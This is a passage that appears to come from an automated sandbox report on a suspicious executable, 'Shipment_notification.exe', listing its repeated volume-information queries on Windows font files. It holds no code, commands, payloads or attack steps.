Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
